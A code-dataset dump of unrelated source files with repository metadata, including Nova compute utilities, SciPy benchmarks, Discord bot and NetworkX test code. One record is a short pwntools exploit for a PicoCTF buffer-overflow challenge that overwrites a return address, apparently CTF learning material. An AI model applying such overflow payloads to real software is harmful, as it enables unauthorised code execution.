)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
|
googleapis/python-shell
|
docs/conf.py
|
Python
|
apache-2.0
| 12,306 | 0.00065 |
import re
import numpy as np
from scipy import special
from .common import with_attributes, safe_import
with safe_import():
from scipy.special import cython_special
FUNC_ARGS = {
'airy_d': (1,),
'airy_D': (1,),
'beta_dd': (0.25, 0.75),
'erf_d': (1,),
'erf_D': (1+1j,),
'exprel_d': (1e-6,),
'gamma_d': (100,),
'gamma_D': (100+100j,),
'jv_dd': (1, 1),
'jv_dD': (1, (1+1j)),
'loggamma_D': (20,),
'logit_d': (0.5,),
'psi_d': (1,),
'psi_D': (1,),
}
class _CythonSpecialMeta(type):
"""
Add time_* benchmarks corresponding to cython_special._bench_*_cy
"""
def __new__(cls, cls_name, bases, dct):
params = [(10, 100, 1000), ('python', 'numpy', 'cython')]
param_names = ['N', 'api']
def get_time_func(name, args):
@with_attributes(params=[(name,), (args,)] + params,
param_names=['name', 'argument'] + param_names)
def func(self, name, args, N, api):
if api == 'python':
self.py_func(N, *args)
elif api == 'numpy':
self.np_func(*self.obj)
else:
self.cy_func(N, *args)
func.__name__ = 'time_' + name
return func
for name in FUNC_ARGS.keys():
func = get_time_func(name, FUNC_ARGS[name])
dct[func.__name__] = func
return type.__new__(cls, cls_name, bases, dct)
class CythonSpecial(metaclass=_CythonSpecialMeta):
def setup(self, name, args, N, api):
self.py_func = getattr(cython_special, '_bench_{}_py'.format(name))
self.cy_func = getattr(cython_special, '_bench_{}_cy'.format(name))
m = re.match('^(.*)_[dDl]+$', name)
self.np_func = getattr(special, m.group(1))
self.obj = []
for arg in args:
self.obj.append(arg*np.ones(N))
self.obj = tuple(self.obj)
|
WarrenWeckesser/scipy
|
benchmarks/benchmarks/cython_special.py
|
Python
|
bsd-3-clause
| 1,956 | 0 |
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
|
Caesurus/CTF_Writeups
|
2019-PicoCTF/exploits/exploit_overflow-1.py
|
Python
|
apache-2.0
| 624 | 0.00641 |
"""Request/Response Schemas are defined here"""
# pylint: disable=invalid-name
from marshmallow import Schema, fields, validate
from todo.constants import TO_DO, IN_PROGRESS, DONE
class TaskSchema(Schema):
"""Schema for serializing an instance of Task"""
id = fields.Int(required=True)
title = fields.Str(required=True)
description = fields.Str(required=True)
status = fields.Str(
required=True,
validate=validate.OneOf(
choices=[TO_DO, IN_PROGRESS, DONE],
error="Status must be one of {choices} (given: {input})"))
number = fields.Int(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardSchema(Schema):
"""Schema for serializing an instance of Board"""
id = fields.Int(required=True)
name = fields.Str(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardDetailsSchema(BoardSchema):
"""Schema for serializing an instance of Board and its tasks"""
tasks = fields.Nested(TaskSchema, many=True)
|
kokimoribe/todo-api
|
todo/schemas.py
|
Python
|
mit
| 1,124 | 0 |
import asyncio
import discord
from discord.ext import commands
from cogs.utils import checks
from cogs.utils.storage import RedisDict
class TemporaryVoice:
"""A cog to create TeamSpeak-like voice channels."""
def __init__(self, liara):
self.liara = liara
self.config = RedisDict('pandentia.tempvoice', liara.redis)
self.config_default = {'channel': None, 'limit': 0}
self.tracked_channels = set()
def __unload(self):
self.config.close()
def filter(self, channels):
_channels = []
for channel in channels:
if channel.name.startswith('Temp: ') or channel.id in self.tracked_channels:
_channels.append(channel)
return _channels
async def create_channel(self, member: discord.Member):
guild = member.guild
overwrites = {
guild.default_role: discord.PermissionOverwrite(connect=False),
member: discord.PermissionOverwrite(connect=True, manage_channels=True, manage_roles=True)
}
channel = await guild.create_voice_channel(('Temp: {}\'s Channel'.format(member.name))[0:32],
overwrites=overwrites)
self.tracked_channels.add(channel.id)
await member.move_to(channel)
async def on_voice_state_update(self, member, *_):
guild = member.guild
if guild is None:
return # /shrug
if self.config.get(guild.id) is None:
return
# lobby processing
channel = self.liara.get_channel(self.config[guild.id]['channel'])
if channel is None:
return
for member in channel.members:
try:
await self.create_channel(member)
except discord.Forbidden:
pass
# empty channel cleanup
await asyncio.sleep(1) # wait for the dust to settle
channels = self.filter(guild.voice_channels)
for channel in channels:
if len(channel.members) == 0:
try:
await channel.delete()
self.tracked_channels.remove(channel.id)
except discord.NotFound or KeyError:
pass
async def on_channel_update(self, before, after):
if before.id not in self.tracked_channels:
return
if before.name != after.name:
await after.edit(name=before.name)
@commands.command()
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def create_lobby(self, ctx):
"""Creates a temporary voice lobby."""
config = self.config.get(ctx.guild.id, self.config_default)
if config['channel'] is not None:
channel = self.liara.get_channel(config['channel'])
if channel is not None:
await ctx.send('You need to remove the original lobby before creating another one.')
return
try:
channel = await ctx.guild.create_voice_channel('Lobby', overwrites={
ctx.guild.default_role: discord.PermissionOverwrite(speak=False)})
if self.config.get(ctx.guild.id) is None:
config['channel'] = channel.id
self.config[ctx.guild.id] = config
else:
self.config[ctx.guild.id]['channel'] = channel.id
self.config.commit(ctx.guild.id)
await ctx.send('Channel created! You can rename it to whatever you want now.')
except discord.Forbidden:
await ctx.send('It would appear that I don\'t have permissions to create channels.')
def setup(liara):
liara.add_cog(TemporaryVoice(liara))
|
Pandentia/Liara-Cogs
|
cogs/tempvoice.py
|
Python
|
mit
| 3,721 | 0.00215 |
import brickpi3
ZZ
|
nextdude/robogator-controller
|
src/test-motor.py
|
Python
|
mit
| 19 | 0 |
#!/usr/bin/env python
"""
Copyright 2014 Jirafe, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Category:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'id': 'str',
'name': 'str'
}
self.id = None # str
self.name = None # str
|
concerned3rdparty/jirafe-python
|
jirafe/models/Category.py
|
Python
|
mit
| 944 | 0.007415 |
#!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestGeneratorsGeometric():
def test_random_geometric_graph(self):
G=nx.random_geometric_graph(50,0.25)
assert_equal(len(G),50)
def test_geographical_threshold_graph(self):
G=nx.geographical_threshold_graph(50,100)
assert_equal(len(G),50)
def test_waxman_graph(self):
G=nx.waxman_graph(50,0.5,0.1)
assert_equal(len(G),50)
G=nx.waxman_graph(50,0.5,0.1,L=1)
assert_equal(len(G),50)
def test_naviable_small_world(self):
G = nx.navigable_small_world_graph(5,p=1,q=0)
gg = nx.grid_2d_graph(5,5).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=3)
gg = nx.grid_graph([5,5,5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=1)
gg = nx.grid_graph([5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
|
LumPenPacK/NetworkExtractionFromImages
|
win_build/nefi2_win_amd64_msvc_2015/site-packages/networkx/generators/tests/test_geometric.py
|
Python
|
bsd-2-clause
| 1,036 | 0.029923 |
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Compute-related Utilities and helpers."""
import contextlib
import functools
import inspect
import itertools
import math
import traceback
import netifaces
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import excutils
from nova.accelerator import cyborg
from nova import block_device
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova import notifications
from nova.notifications.objects import aggregate as aggregate_notification
from nova.notifications.objects import base as notification_base
from nova.notifications.objects import compute_task as task_notification
from nova.notifications.objects import exception as notification_exception
from nova.notifications.objects import flavor as flavor_notification
from nova.notifications.objects import instance as instance_notification
from nova.notifications.objects import keypair as keypair_notification
from nova.notifications.objects import libvirt as libvirt_notification
from nova.notifications.objects import metrics as metrics_notification
from nova.notifications.objects import request_spec as reqspec_notification
from nova.notifications.objects import scheduler as scheduler_notification
from nova.notifications.objects import server_group as sg_notification
from nova.notifications.objects import volume as volume_notification
from nova import objects
from nova.objects import fields
from nova import rpc
from nova import safe_utils
from nova import utils
CONF = nova.conf.CONF
LOG = log.getLogger(__name__)
# These properties are specific to a particular image by design. It
# does not make sense for them to be inherited by server snapshots.
# This list is distinct from the configuration option of the same
# (lowercase) name.
NON_INHERITABLE_IMAGE_PROPERTIES = frozenset([
'cinder_encryption_key_id',
'cinder_encryption_key_deletion_policy',
'img_signature',
'img_signature_hash_method',
'img_signature_key_type',
'img_signature_certificate_uuid'])
# Properties starting with these namespaces are reserved for internal
# use by other services. It does not make sense (and may cause a request
# fail) if we include them in a snapshot.
NON_INHERITABLE_IMAGE_NAMESPACES = frozenset([
'os_glance',
])
def exception_to_dict(fault, message=None):
"""Converts exceptions to a dict for use in notifications.
:param fault: Exception that occurred
:param message: Optional fault message, otherwise the message is derived
from the fault itself.
:returns: dict with the following items:
- exception: the fault itself
- message: one of (in priority order):
- the provided message to this method
- a formatted NovaException message
- the fault class name
- code: integer code for the fault (defaults to 500)
"""
# TODO(johngarbutt) move to nova/exception.py to share with wrap_exception
code = 500
if hasattr(fault, "kwargs"):
code = fault.kwargs.get('code', 500)
# get the message from the exception that was thrown
# if that does not exist, use the name of the exception class itself
try:
if not message:
message = fault.format_message()
# These exception handlers are broad so we don't fail to log the fault
# just because there is an unexpected error retrieving the message
except Exception:
# In this case either we have a NovaException which failed to format
# the message or we have a non-nova exception which could contain
# sensitive details. Since we're not sure, be safe and set the message
# to the exception class name. Note that we don't guard on
# context.is_admin here because the message is always shown in the API,
# even to non-admin users (e.g. NoValidHost) but only the traceback
# details are shown to users with the admin role. Checking for admin
# context here is also not helpful because admins can perform
# operations on a tenant user's server (migrations, reboot, etc) and
# service startup and periodic tasks could take actions on a server
# and those use an admin context.
message = fault.__class__.__name__
# NOTE(dripton) The message field in the database is limited to 255 chars.
# MySQL silently truncates overly long messages, but PostgreSQL throws an
# error if we don't truncate it.
u_message = utils.safe_truncate(message, 255)
fault_dict = dict(exception=fault)
fault_dict["message"] = u_message
fault_dict["code"] = code
return fault_dict
def _get_fault_details(exc_info, error_code):
details = ''
# TODO(mriedem): Why do we only include the details if the code is 500?
# Though for non-nova exceptions the code will probably be 500.
if exc_info and error_code == 500:
# We get the full exception details including the value since
# the fault message may not contain that information for non-nova
# exceptions (see exception_to_dict).
details = ''.join(traceback.format_exception(
exc_info[0], exc_info[1], exc_info[2]))
return str(details)
def add_instance_fault_from_exc(context, instance, fault, exc_info=None,
fault_message=None):
"""Adds the specified fault to the database."""
fault_obj = objects.InstanceFault(context=context)
fault_obj.host = CONF.host
fault_obj.instance_uuid = instance.uuid
fault_obj.update(exception_to_dict(fault, message=fault_message))
code = fault_obj.code
fault_obj.details = _get_fault_details(exc_info, code)
fault_obj.create()
def get_device_name_for_instance(instance, bdms, device):
"""Validates (or generates) a device name for instance.
This method is a wrapper for get_next_device_name that gets the list
of used devices and the root device from a block device mapping.
:raises TooManyDiskDevices: if the maxmimum allowed devices to attach to a
single instance is exceeded.
"""
mappings = block_device.instance_block_mapping(instance, bdms)
return get_next_device_name(instance, mappings.values(),
mappings['root'], device)
def default_device_names_for_instance(instance, root_device_name,
*block_device_lists):
"""Generate missing device names for an instance.
:raises TooManyDiskDevices: if the maxmimum allowed devices to attach to a
single instance is exceeded.
"""
dev_list = [bdm.device_name
for bdm in itertools.chain(*block_device_lists)
if bdm.device_name]
if root_device_name not in dev_list:
dev_list.append(root_device_name)
for bdm in itertools.chain(*block_device_lists):
dev = bdm.device_name
if not dev:
dev = get_next_device_name(instance, dev_list,
root_device_name)
bdm.device_name = dev
bdm.save()
dev_list.append(dev)
def check_max_disk_devices_to_attach(num_devices):
maximum = CONF.compute.max_disk_devices_to_attach
if maximum < 0:
return
if num_devices > maximum:
raise exception.TooManyDiskDevices(maximum=maximum)
def get_next_device_name(instance, device_name_list,
root_device_name=None, device=None):
"""Validates (or generates) a device name for instance.
If device is not set, it will generate a unique device appropriate
for the instance. It uses the root_device_name (if provided) and
the list of used devices to find valid device names. If the device
name is valid but applicable to a different backend (for example
/dev/vdc is specified but the backend uses /dev/xvdc), the device
name will be converted to the appropriate format.
:raises TooManyDiskDevices: if the maxmimum allowed devices to attach to a
single instance is exceeded.
"""
req_prefix = None
req_letter = None
if device:
try:
req_prefix, req_letter = block_device.match_device(device)
except (TypeError, AttributeError, ValueError):
raise exception.InvalidDevicePath(path=device)
if not root_device_name:
root_device_name = block_device.DEFAULT_ROOT_DEV_NAME
try:
prefix = block_device.match_device(
block_device.prepend_dev(root_device_name))[0]
except (TypeError, AttributeError, ValueError):
raise exception.InvalidDevicePath(path=root_device_name)
if req_prefix != prefix:
LOG.debug("Using %(prefix)s instead of %(req_prefix)s",
{'prefix': prefix, 'req_prefix': req_prefix})
used_letters = set()
for device_path in device_name_list:
letter = block_device.get_device_letter(device_path)
used_letters.add(letter)
check_max_disk_devices_to_attach(len(used_letters) + 1)
if not req_letter:
req_letter = _get_unused_letter(used_letters)
if req_letter in used_letters:
raise exception.DevicePathInUse(path=device)
return prefix + req_letter
def get_root_bdm(context, instance, bdms=None):
if bdms is None:
if isinstance(instance, objects.Instance):
uuid = instance.uuid
else:
uuid = instance['uuid']
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, uuid)
return bdms.root_bdm()
def is_volume_backed_instance(context, instance, bdms=None):
root_bdm = get_root_bdm(context, instance, bdms)
if root_bdm is not None:
return root_bdm.is_volume
# in case we hit a very old instance without root bdm, we _assume_ that
# instance is backed by a volume, if and only if image_ref is not set
if isinstance(instance, objects.Instance):
return not instance.image_ref
return not instance['image_ref']
def heal_reqspec_is_bfv(ctxt, request_spec, instance):
"""Calculates the is_bfv flag for a RequestSpec created before Rocky.
Starting in Rocky, new instances have their RequestSpec created with
the "is_bfv" flag to indicate if they are volume-backed which is used
by the scheduler when determining root disk resource allocations.
RequestSpecs created before Rocky will not have the is_bfv flag set
so we need to calculate it here and update the RequestSpec.
:param ctxt: nova.context.RequestContext auth context
:param request_spec: nova.objects.RequestSpec used for scheduling
:param instance: nova.objects.Instance being scheduled
"""
if 'is_bfv' in request_spec:
return
# Determine if this is a volume-backed instance and set the field
# in the request spec accordingly.
request_spec.is_bfv = is_volume_backed_instance(ctxt, instance)
request_spec.save()
def convert_mb_to_ceil_gb(mb_value):
gb_int = 0
if mb_value:
gb_float = mb_value / 1024.0
# ensure we reserve/allocate enough space by rounding up to nearest GB
gb_int = int(math.ceil(gb_float))
return gb_int
def _get_unused_letter(used_letters):
# Return the first unused device letter
index = 0
while True:
letter = block_device.generate_device_letter(index)
if letter not in used_letters:
return letter
index += 1
def get_value_from_system_metadata(instance, key, type, default):
"""Get a value of a specified type from image metadata.
@param instance: The instance object
@param key: The name of the property to get
@param type: The python type the value is be returned as
@param default: The value to return if key is not set or not the right type
"""
value = instance.system_metadata.get(key, default)
try:
return type(value)
except ValueError:
LOG.warning("Metadata value %(value)s for %(key)s is not of "
"type %(type)s. Using default value %(default)s.",
{'value': value, 'key': key, 'type': type,
'default': default}, instance=instance)
return default
def notify_usage_exists(notifier, context, instance_ref, host,
current_period=False, ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
"""Generates 'exists' unversioned legacy and transformed notification
for an instance for usage auditing purposes.
:param notifier: a messaging.Notifier
:param context: request context for the current operation
:param instance_ref: nova.objects.Instance object from which to report
usage
:param host: the host emitting the notification
:param current_period: if True, this will generate a usage for the
current usage period; if False, this will generate a usage for the
previous audit period.
:param ignore_missing_network_data: if True, log any exceptions generated
while getting network info; if False, raise the exception.
:param system_metadata: system_metadata override for the instance. If
None, the instance_ref.system_metadata will be used.
:param extra_usage_info: Dictionary containing extra values to add or
override in the notification if not None.
"""
audit_start, audit_end = notifications.audit_period_bounds(current_period)
if system_metadata is None:
system_metadata = utils.instance_sys_meta(instance_ref)
# add image metadata to the notification:
image_meta = notifications.image_meta(system_metadata)
extra_info = dict(audit_period_beginning=str(audit_start),
audit_period_ending=str(audit_end),
image_meta=image_meta)
if extra_usage_info:
extra_info.update(extra_usage_info)
notify_about_instance_usage(notifier, context, instance_ref, 'exists',
extra_usage_info=extra_info)
audit_period = instance_notification.AuditPeriodPayload(
audit_period_beginning=audit_start,
audit_period_ending=audit_end,
)
payload = instance_notification.InstanceExistsPayload(
context=context,
instance=instance_ref,
audit_period=audit_period,
)
notification = instance_notification.InstanceExistsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE,
),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.EXISTS,
),
payload=payload,
)
notification.emit(context)
def notify_about_instance_usage(notifier, context, instance, event_suffix,
network_info=None, extra_usage_info=None,
fault=None):
"""Send an unversioned legacy notification about an instance.
All new notifications should use notify_about_instance_action which sends
a versioned notification.
:param notifier: a messaging.Notifier
:param event_suffix: Event type like "delete.start" or "exists"
:param network_info: Networking information, if provided.
:param extra_usage_info: Dictionary containing extra values to add or
override in the notification.
"""
if not extra_usage_info:
extra_usage_info = {}
usage_info = notifications.info_from_instance(context, instance,
network_info, populate_image_ref_url=True, **extra_usage_info)
if fault:
# NOTE(johngarbutt) mirrors the format in wrap_exception
fault_payload = exception_to_dict(fault)
LOG.debug(fault_payload["message"], instance=instance)
usage_info.update(fault_payload)
if event_suffix.endswith("error"):
method = notifier.error
else:
method = notifier.info
method(context, 'compute.instance.%s' % event_suffix, usage_info)
def _get_fault_and_priority_from_exception(exception: Exception):
fault = None
priority = fields.NotificationPriority.INFO
if not exception:
return fault, priority
fault = notification_exception.ExceptionPayload.from_exception(exception)
priority = fields.NotificationPriority.ERROR
return fault, priority
@rpc.if_notifications_enabled
def notify_about_instance_action(context, instance, host, action, phase=None,
source=fields.NotificationSource.COMPUTE,
exception=None, bdms=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
:param phase: the phase of the action
:param source: the source of the notification
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionPayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceActionNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=source),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_create(context, instance, host, phase=None,
exception=None, bdms=None):
"""Send versioned notification about instance creation
:param context: the request context
:param instance: the instance being created
:param host: the host emitting the notification
:param phase: the phase of the creation
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceCreatePayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceCreateNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.CREATE,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_scheduler_action(context, request_spec, action, phase=None,
source=fields.NotificationSource.SCHEDULER):
"""Send versioned notification about the action made by the scheduler
:param context: the RequestContext object
:param request_spec: the RequestSpec object
:param action: the name of the action
:param phase: the phase of the action
:param source: the source of the notification
"""
payload = reqspec_notification.RequestSpecPayload(
request_spec=request_spec)
notification = scheduler_notification.SelectDestinationsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=source),
event_type=notification_base.EventType(
object='scheduler',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_attach_detach(context, instance, host, action, phase,
volume_id=None, exception=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
:param phase: the phase of the action
:param volume_id: id of the volume will be attached
:param exception: the thrown exception (used in error notifications)
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionVolumePayload(
context=context,
instance=instance,
fault=fault,
volume_id=volume_id)
notification = instance_notification.InstanceActionVolumeNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_rescue_action(context, instance, host,
rescue_image_ref, phase=None,
exception=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param rescue_image_ref: the rescue image ref
:param phase: the phase of the action
:param exception: the thrown exception (used in error notifications)
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionRescuePayload(
context=context,
instance=instance,
fault=fault,
rescue_image_ref=rescue_image_ref)
notification = instance_notification.InstanceActionRescueNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.RESCUE,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_keypair_action(context, keypair, action, phase):
"""Send versioned notification about the keypair action on the instance
:param context: the request context
:param keypair: the keypair which the action performed on
:param action: the name of the action
:param phase: the phase of the action
"""
payload = keypair_notification.KeypairPayload(keypair=keypair)
notification = keypair_notification.KeypairNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='keypair',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_swap(context, instance, host, phase,
old_volume_id, new_volume_id, exception=None):
"""Send versioned notification about the volume swap action
on the instance
:param context: the request context
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param phase: the phase of the action
:param old_volume_id: the ID of the volume that is copied from and detached
:param new_volume_id: the ID of the volume that is copied to and attached
:param exception: an exception
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionVolumeSwapPayload(
context=context,
instance=instance,
fault=fault,
old_volume_id=old_volume_id,
new_volume_id=new_volume_id)
instance_notification.InstanceActionVolumeSwapNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.VOLUME_SWAP,
phase=phase),
payload=payload).emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_snapshot(context, instance, host, phase,
snapshot_image_id):
"""Send versioned notification about the snapshot action executed on the
instance
:param context: the request context
:param instance: the instance from which a snapshot image is being created
:param host: the host emitting the notification
:param phase: the phase of the action
:param snapshot_image_id: the ID of the snapshot
"""
payload = instance_notification.InstanceActionSnapshotPayload(
context=context,
instance=instance,
fault=None,
snapshot_image_id=snapshot_image_id)
instance_notification.InstanceActionSnapshotNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.SNAPSHOT,
phase=phase),
payload=payload).emit(context)
@rpc.if_notifications_enabled
def notify_about_resize_prep_instance(context, instance, host, phase,
new_flavor):
"""Send versioned notification about the instance resize action
on the instance
:param context: the request context
:param instance: the instance which the resize action performed on
:param host: the host emitting the notification
:param phase: the phase of the action
:param new_flavor: new flavor
"""
payload = instance_notification.InstanceActionResizePrepPayload(
context=context,
instance=instance,
fault=None,
new_flavor=flavor_notification.FlavorPayload(flavor=new_flavor))
instance_notification.InstanceActionResizePrepNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.RESIZE_PREP,
phase=phase),
payload=payload).emit(context)
def notify_about_server_group_update(context, event_suffix, sg_payload):
"""Send a notification about server group update.
:param event_suffix: Event type like "create.start" or "create.end"
:param sg_payload: payload for server group update
"""
notifier = rpc.get_notifier(service='servergroup')
notifier.info(context, 'servergroup.%s' % event_suffix, sg_payload)
def notify_about_aggregate_update(context, event_suffix, aggregate_payload):
"""Send a notification about aggregate update.
:param event_suffix: Event type like "create.start" or "create.end"
:param aggregate_payload: payload for aggregate update
"""
aggregate_identifier = aggregate_payload.get('aggregate_id', None)
if not aggregate_identifier:
aggregate_identifier = aggregate_payload.get('name', None)
if not aggregate_identifier:
LOG.debug("No aggregate id or name specified for this "
"notification and it will be ignored")
return
notifier = rpc.get_notifier(service='aggregate',
host=aggregate_identifier)
notifier.info(context, 'aggregate.%s' % event_suffix, aggregate_payload)
@rpc.if_notifications_enabled
def notify_about_aggregate_action(context, aggregate, action, phase):
payload = aggregate_notification.AggregatePayload(aggregate)
notification = aggregate_notification.AggregateNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='aggregate',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_aggregate_cache(context, aggregate, host, image_status,
index, total):
"""Send a notification about aggregate cache_images progress.
:param context: The RequestContext
:param aggregate: The target aggregate
:param host: The host within the aggregate for which to report status
:param image_status: The result from the compute host, which is a dict
of {image_id: status}
:param index: An integer indicating progress toward completion, between
1 and $total
:param total: The total number of hosts being processed in this operation,
to bound $index
"""
success_statuses = ('cached', 'existing')
payload = aggregate_notification.AggregateCachePayload(aggregate,
host,
index,
total)
payload.images_cached = []
payload.images_failed = []
for img, status in image_status.items():
if status in success_statuses:
payload.images_cached.append(img)
else:
payload.images_failed.append(img)
notification = aggregate_notification.AggregateCacheNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.CONDUCTOR),
event_type=notification_base.EventType(
object='aggregate',
action=fields.NotificationAction.IMAGE_CACHE,
phase=fields.NotificationPhase.PROGRESS),
payload=payload)
notification.emit(context)
def notify_about_host_update(context, event_suffix, host_payload):
"""Send a notification about host update.
:param event_suffix: Event type like "create.start" or "create.end"
:param host_payload: payload for host update. It is a dict and there
should be at least the 'host_name' key in this
dict.
"""
host_identifier = host_payload.get('host_name')
if not host_identifier:
LOG.warning("No host name specified for the notification of "
"HostAPI.%s and it will be ignored", event_suffix)
return
notifier = rpc.get_notifier(service='api', host=host_identifier)
notifier.info(context, 'HostAPI.%s' % event_suffix, host_payload)
@rpc.if_notifications_enabled
def notify_about_server_group_action(context, group, action):
payload = sg_notification.ServerGroupPayload(group)
notification = sg_notification.ServerGroupNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='server_group',
action=action),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_server_group_add_member(context, group_id):
group = objects.InstanceGroup.get_by_uuid(context, group_id)
payload = sg_notification.ServerGroupPayload(group)
notification = sg_notification.ServerGroupNotification(
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.API),
event_type=notification_base.EventType(
object='server_group',
